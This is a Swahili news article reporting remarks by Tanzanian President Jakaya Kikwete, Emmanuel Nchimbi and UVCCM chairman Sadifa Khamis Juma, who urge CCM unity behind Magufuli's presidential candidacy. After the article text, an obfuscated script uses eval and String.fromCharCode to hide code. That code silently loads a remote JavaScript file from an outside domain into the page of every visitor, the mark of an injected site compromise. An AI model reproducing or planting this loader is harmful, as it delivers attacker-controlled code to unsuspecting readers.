MWENYEKITI wa Chama Cha Mapinduzi (CCM) Taifa, Rais Jakaya Kikwete, amesema anayetoka CCM kwa sasa, anafanya hivyo kwa hiarina mapenzi yake mwenyewe kwa sababu uamuzi wa nani agombee urais kupitia chama hicho, ulifanyika kwa pamoja.
Alisema uamuzi huo ulifanyika kwa mujibu wa Katiba ya CCM na ilipigwa kura ndani ya Halmashauri Kuu ya Taifa baada ya mjadala mrefu na maamuzi kuchukuliwa kwa pamoja.
Rais Kikwete aliyasema hayo juzi usiku wakati akizungumza na Wajumbe wa Baraza Kuu la Umoja wa Vijana wa chama hicho (UVCCM) na kusisitiza kuwa, hakuna haki iliyovunjwa katika mchakato huo lakini kuna baadhi ya wanachama walishaamua kutoka CCM kabla ya vikao vya Dodoma.
“Mchakato umekwisha, aliyepata kapata, aliyekosa kakosa, mchakato huu haurudiwi tena, hatuwezi kuitisha tena mkutano mkuu, lililobakia sasa tunasubiri Magufuli arudishe fomu baada ya hapo ni Ihyena Ihyena na mambo yanakwenda, haya ndiyo mapenzi ya Mungu,” alisema.
Aliongeza kuwa, CCM ni chama bora ambacho huzingatia uwezo, sifa za wagombea wao ambapo Dkt. Magufuli ni mgombea sahihi wa urais kupitia CCM ambayo ina kila sababu ya kujivunia utendaji wake katika shughuli mbalimbali za maendeleo ya Taifa.
Dkt. Nchimbi ataka ushirikiano
Naye Dkt. Emmanuel Nchimbi, alisema wana CCM wa kweli ni wale ambao huamua kuyaacha makundi yao na kumuunga mkono mgombea mmoja wa nafasi ya urais kwa kuwa mchakato wa uteuzi ulikamilika hivyo wanachama wote wanapaswa kushirikiana.
Alisema katika kila chaguzi, makundi ni kitu cha kawaida na huvunjwabaada ya kupatikana mgombea mmoja na kuunda kundi moja hivyo kaziiliyobaki ni kumpigania Dkt. Magufuli apate ushindi wa kishindo pamojana wagombea wengine wa CCM ngazi ya wabunge na madiwani.
“Nitashangaa kuwaona wana CCM wakiendeleza makundi wakati mchakato wa kumpata mgombea urais uliishia Dodoma, kazi iliyobaki ni moja tu ya kusaka ushindi wa tsunami katika Uchaguzi Mkuu ujao wa rais, wabunge na madiwani,” alisema Dkt. Nchimbi.
Sadifa abainisha mikakati yao
Mwenyekiti wa UVCCM Taifa, Sadifa Khamis Juma, alisema umoja huoni ngao ya ushindi wa CCM hivyo vijana wanapaswa kushirikiana kwa hali na mali ili kuendelea kuiweka Serikali ya CCM madarakani.
Alisema UVCCM haitakubali kuona Serikali ya CCM inaondoka madarakani wakati chama chao kina kila hali, sababu na uwezo wa kushinda katika Uchaguzi Mkuu ujao kwani ilani yao inajieleza.
“Uwezo, sababu na hali ya kushinda tunavyo, hatutakubali kuona Serikali ya CCM inaondoka madarakani kwani ilani ya chama chetuinatekelezwa kwa asilimia 100, rai yangu kwa vijana wote wa CCM tuhakikishe chama kinapata ushindi wa kishindo,” alisema.
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments